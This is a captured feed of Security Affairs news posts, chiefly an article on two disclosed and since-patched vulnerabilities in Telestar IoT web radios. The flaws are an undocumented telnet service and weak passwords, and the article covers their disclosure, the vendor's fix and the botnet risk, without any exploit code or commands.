(SecurityAffairs – Microsoft Patch Tuesday, hacking)

The post Microsoft Patch Tuesday updates for September 2019 fix 2 privilege escalation flaws exploited in attacks appeared first on Security Affairs.

[Category: Breaking News, Security, information security news, Microsoft Patch Tuesday, Pierluigi Paganini, Security Affairs, Security News, zero-Day]

[l] at 9/10/19 10:27am
A security researcher disclosed zero-day flaws in Telestar Digital GmbH IoT radio devices that could be exploited by remote attackers to hijack systems without any user interaction.

The security researcher Benjamin Kunz from Vulnerability-Lab disclosed zero-day flaws in Telestar Digital GmbH IoT radio devices that could be exploited by remote attackers to hijack devices without any user interaction.

Telestar Digital GmbH IoT radio devices

The vulnerabilities have been tracked as CVE-2019-13473 and CVE-2019-13474.

The issues were discovered several weeks ago when the company, while investigating an anomaly on a private network, noticed the presence of the Telestar web radio terminals. The researchers discovered an undocumented telnetd server on the standard port 23; since port forwarding was activated for all ports on the network, the devices could be reached from the outside.

“During the investigation of the security incident with our company, we noticed an undocumented Telnet service on the standard port 23 on the said end devices during a port scan. Since port forwarding was activated for all ports on this network, it could be addressed from the outside.” reads the report published by the experts. “Telnet services are less used today, because content is transmitted unencrypted and there are better alternatives today. Nevertheless, the protocol on network level and in end devices is still a bigger topic than originally thought.”

The IoT radio devices are manufactured by Imperial & Dabman (Series I and D) and are distributed in Germany by Telestar, but the experts pointed out that it is also possible to buy them from resellers via eBay and Amazon. The devices have an httpd web server, Web GUI, WiFi, or Bluetooth on board. The hardware of the terminals is equipped with Shenzhen technology, while the firmware is based on BusyBox Linux Debian.

Kunz and his colleagues were able to brute-force the IoT radio in just 10 minutes and achieve root access with full privileges.

The researchers were able to edit some of the folders, create files, and modify paths to determine what could be changed in the native source of the application.

“Finally we were able to edit and access everything on the box and had the ability to fully compromise the smart web radio device.” continue the experts.

The following video shows how it is possible to compromise the radio devices.

Attackers can perform a broad range of actions by exploiting the issues, including changing device names, setting the boot logo, setting the volume, forcing a play stream, saving audio files as messages, and transmitting audio as commands both locally and remotely.

According to Kunz, more than one million devices are potentially at risk; an attacker could exploit the flaws to build a huge botnet that could be used to launch powerful DDoS attacks.

The experts reported the vulnerabilities to Telestar Digital GmbH on June 1, and the company released a fix to address the flaws by August 30.

The telnetd service is being deactivated, and old and weak passwords are also being removed or changed. Automatic updates are available via Wi-Fi and can be installed by resetting the IoT radio devices to factory settings and downloading the latest firmware version.

The good news is that Telestar Digital GmbH is not aware of attacks exploiting the vulnerabilities in the wild.


Pierluigi Paganini

(SecurityAffairs – IoT radio devices, hacking)


The post Million of Telestar Digital GmbH IoT radio devices can be remotely hacked appeared first on Security Affairs.

[Category: Breaking News, Hacking, Internet of Things, hacking news, information security news, IoT, Pierluigi Paganini, Security Affairs, Security News, Telestar Digital GmbH IoT radio devices]

As of 9/15/19 10:01am. Last new 9/15/19 4:58am.
